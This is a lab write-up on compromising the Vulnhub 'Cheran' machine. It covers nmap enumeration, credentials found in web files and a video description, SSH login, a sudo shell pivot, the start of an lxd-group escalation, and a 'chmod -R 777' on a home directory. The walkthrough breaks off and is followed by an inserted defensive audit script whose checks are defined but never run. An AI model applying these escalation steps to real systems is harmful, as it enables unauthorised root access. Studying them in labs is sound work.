Today we are going to hack the Vulnhub machine called Cheran. You can download it from the following link:
Cheran
Enumeration
We start with an nmap scan to see which ports are open.
~ > nmap -A -p- 192.168.1.35
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-08 11:28 CEST
Nmap scan report for 192.168.1.35
Host is up (0.049s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 38:20:1e:42:7a:d6:a9:2a:01:62:58:f3:b6:37:d8:41 (RSA)
| 256 e8:c1:5a:14:7a:c6:09:24:b6:0a:c0:05:e4:82:03:d9 (ECDSA)
|_ 256 91:b9:e9:b9:e7:83:7a:28:71:48:c4:58:9b:39:7b:a1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: A complete list of Chera Rulers and their contribution
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h50m02s, deviation: 3h10m31s, median: -2s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: ubuntu
| NetBIOS computer name: UBUNTU\x00
| Domain name: \x00
| FQDN: ubuntu
|_ System time: 2020-09-08T14:59:23+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-08 11:29:23
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds
Checking http://192.168.1.35/robots.txt shows:
/*
/users
/youtube
If we visit http://192.168.1.35/users.txt we see "Rajasimha", which, as the file name suggests, may be the user.
On the other hand, if we visit http://192.168.1.35/youtube/youtube.html we find a list of links to YouTube videos.
If we click on the fourth link from the bottom, we can see at the end of the video description:
Password : k4rur
Now that we have a user/password pair, we try to log in over SSH.
Low Shell
~ > ssh Rajasimha@192.168.1.35
Rajasimha@192.168.1.35's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Sep 8 15:06:41 IST 2020
System load: 0.04 Processes: 97
Usage of /: 25.4% of 9.78GB Users logged in: 0
Memory usage: 33% IP address for enp0s3: 192.168.1.35
Swap usage: 0%
Last login: Wed Jul 29 20:04:15 2020 from 192.168.1.9
Rajasimha@ubuntu:~$
We check whether we can do anything with sudo.
Rajasimha@ubuntu:/tmp$ sudo -l
[sudo] password for Rajasimha:
Matching Defaults entries for Rajasimha on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User Rajasimha may run the following commands on ubuntu:
(ALL, !root) /bin/bash
We see that we can use sudo to get a shell with the privileges of "cheran".
As "cheran" we see that we are a member of the lxd group, so we are going to use lxd to read the root flag: we mount the host filesystem inside a container and, from inside the container, access the host's root directory.
We start by initialising lxd.
cheran@ubuntu:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
cheran@ubuntu:~$
In the following steps, the user "cheran" needs access to a file in Rajasimha's home directory in order to import the container and use lxc, so as user Rajasimha we run the following command to make everything in that home accessible to everyone.
Rajasimha@ubuntu:/home$ chmod -R 777 Rajasimha/
We will follow the steps described in [1] to use lxd.
On our own machine we download the following script, which will prepare an image for us.
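As an added example (not from the original post), here is a small audit script that flags the three host weaknesses this walkthrough chains together: membership in the lxd group, a sudo rule that grants an interactive shell as other users, and a world-writable home directory. The /etc/group excerpt, the `sudo -l` output and the home tree it inspects are constructed to mirror the target; pass real paths to the functions to check an actual host.

```shell
#!/bin/sh
# Added defensive audit (not part of the original post): flags the three
# host weaknesses the walkthrough relies on. The sample files below are
# constructed to mirror the target; pass real paths to audit a host.
set -u

# Constructed /etc/group excerpt: "cheran" sits in the lxd group.
SAMPLE_GROUP=$(mktemp)
cat >"$SAMPLE_GROUP" <<'EOF'
root:x:0:
sudo:x:27:Rajasimha
lxd:x:131:cheran
EOF

# Constructed `sudo -l` output for Rajasimha, as seen on the target.
SAMPLE_SUDO=$(mktemp)
cat >"$SAMPLE_SUDO" <<'EOF'
User Rajasimha may run the following commands on ubuntu:
    (ALL, !root) /bin/bash
EOF

# Constructed /home tree after the walkthrough's "chmod -R 777 Rajasimha/".
SAMPLE_HOME=$(mktemp -d)
mkdir "$SAMPLE_HOME/Rajasimha" "$SAMPLE_HOME/cheran"
chmod 777 "$SAMPLE_HOME/Rajasimha"
chmod 750 "$SAMPLE_HOME/cheran"

# Members of the lxd group: each can mount the host filesystem into a
# privileged container, which is root-equivalent. Prints the member list.
lxd_members() {
    awk -F: '$1 == "lxd" { print $4 }' "$1"
}

# Exit 0 when a sudo rule hands out a shell as other users (the
# "(ALL, !root) /bin/bash" pattern); such rules should name one command.
shell_sudo_rule() {
    grep -E '^[[:space:]]*\([^)]*ALL[^)]*\)[[:space:]]+(/bin/bash|/bin/sh|/bin/dash)$' "$1" >/dev/null
}

# World-writable home directories under the given path (mode o+w set).
world_writable_homes() {
    find "$1" -mindepth 1 -maxdepth 1 -type d -perm -0002
}
```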